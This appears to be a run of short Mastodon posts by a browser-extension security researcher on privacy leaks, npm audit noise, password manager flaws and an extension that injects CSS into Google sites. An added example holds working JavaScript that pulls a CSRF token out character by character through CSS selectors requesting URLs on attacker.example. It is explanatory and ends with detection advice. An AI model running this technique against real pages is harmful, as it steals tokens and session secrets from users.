More details in the article here. Grindr gave location data to third parties which was detailed enough to be associated with a priest and to out him as gay. Yet they keep claiming that this is “infeasible from a technical standpoint.” Yeah, sure…
Huge surprise! Yes, claims that data is being “anonymized” are usually merely a lame excuse. Given enough data, de-anonymization will often be possible. And that’s especially the case for highly sensitive data like movement profiles.
Their autoreply mentions the “new data protection policy.” Yes, it has been merely three years. Not nearly enough time to get accustomed to it of course.
I’ve also had my share of user complaints about npm audit reporting hundreds of issues without impact on my project. I’ve also wasted time upgrading dependencies for no other reason than to silence these warnings. The issue is real; currently npm audit is clearly not helping.
Yes, Kaspersky Password Manager is ridiculously ill-designed. Given what I saw there three years ago, this vulnerability is not the least surprising.
As if developers copy-pasting code without properly considering licenses wasn’t a time bomb already, we now have AI happily doing it for you. Thanks GitHub!
If an extension lets anyone inject CSS into Google websites, how bad could this get? This isn’t XSS but still pretty bad. From displaying scams on trusted websites to exfiltrating data: lots of possibilities.
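One concrete way injected CSS can exfiltrate data without any script execution, as an added example that is not part of the original post: attribute-prefix selectors (`input[value^="ab"]`) whose matching rule loads a background image from an attacker-controlled host, so the browser's request reveals which prefix matched. The element name `csrf`, the host `attacker.example`, the hex alphabet and the sample token value are all assumptions; the victim DOM and the browser's selector matching are simulated so the block runs offline in Node.

```javascript
// Added example, not code from the original post or from the extension discussed.
// Demonstrates CSS-only exfiltration of an attribute value via attribute-prefix
// selectors plus attacker-controlled background-image URLs.

const ALPHABET = '0123456789abcdef'; // assumption: the secret is hex

// One round of rules: for the prefix recovered so far, one rule per candidate
// next character. Only the rule whose prefix matches triggers a request.
function buildRules(knownPrefix, {
  selectorBase = 'input[name="csrf"]',        // assumed target element
  exfilHost = 'https://attacker.example',     // assumed attacker host
} = {}) {
  return [...ALPHABET].map(ch => {
    const prefix = knownPrefix + ch;
    return {
      prefix,
      css: `${selectorBase}[value^="${prefix}"] { background-image: url("${exfilHost}/leak?p=${prefix}"); }`,
    };
  });
}

// Constructed stand-in for the victim page's DOM: the single targeted element.
const victimElement = { tagName: 'input', name: 'csrf', value: '9f3a' };

// Stand-in for the browser: apply selector matching and return the URLs it
// would fetch for the matching rules (this is the leak channel).
function applyRules(rules, element) {
  return rules
    .filter(r => element.value.startsWith(r.prefix))
    .map(r => /url\("([^"]+)"\)/.exec(r.css)[1]);
}

// Attacker's server side: recover the matched prefix from the request URL.
function leakedPrefix(requestUrl) {
  return new URL(requestUrl).searchParams.get('p');
}

// Drive successive rounds until `length` characters are known.
// Returns null if a round produces no (or an ambiguous) request, e.g. when
// the alphabet assumption is wrong or the value is shorter than expected.
function exfiltrate(element, length) {
  let known = '';
  for (let i = 0; i < length; i++) {
    const requests = applyRules(buildRules(known), element);
    if (requests.length !== 1) return null;
    known = leakedPrefix(requests[0]);
  }
  return known;
}

console.log(exfiltrate(victimElement, 4)); // recovers the constructed token
```

In a real browser each round is one injected stylesheet and the leak shows up as a `background-image` request to a host the page never references; that is also the thing to look for when checking whether injected styles are doing more than cosmetic damage. A page-level CSP does not help against an extension, since extension-injected styles are not subject to it.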
Very nice reporting experience for a change.
Nice blog post by @LaxmanMuthiyah. All the details check out, it sounds like Apple had a massive vulnerability in their iCloud infrastructure and downplayed the severity. With passwords that are way too short, rate limiting is your only line of defense.
Verified that I didn’t make any mistakes in the formula, finally searched for an existing solution. Turned out that the hammer I had didn’t match the nail, and B-splines were the way to go. This just worked.
In my defense: I didn’t have internet when I was thinking this up. 🙈
Wonderful. In this case, the manipulated device was merely used to deliver a malicious application. The badly written letter also triggered alarms. And now imagine the same thing done properly, without anything to tip off users.
@xerz I remember that undercover agents need to commit crimes without being charged with criminal offenses. Otherwise it would be trivial to blow their cover: anyone unwilling to commit a crime is an agent. So there must be some law covering this, and it probably applies here as well…
@xerz That’s what I thought as well. Then again, they didn’t know that they were working for a honeypot company. They thought that they were doing real crime. 🤷‍♂️
I wonder however: how do the people who did know the scheme go free of charges? Investigation or not, they willingly facilitated crimes. How far could they go without being charged with anything?
Yes, it’s easy to get all paranoid here. The big question is whether the paranoia is justified, and I don’t expect the answer to turn up any time soon. All we get is a suspicion that there might be more things going on than busting drug cartels.
Wladimir Palant, software developer and security researcher, browser extensions expert. He/him
Other Mastodon account for non-technical topics: https://social.tchncs.de/@WPalant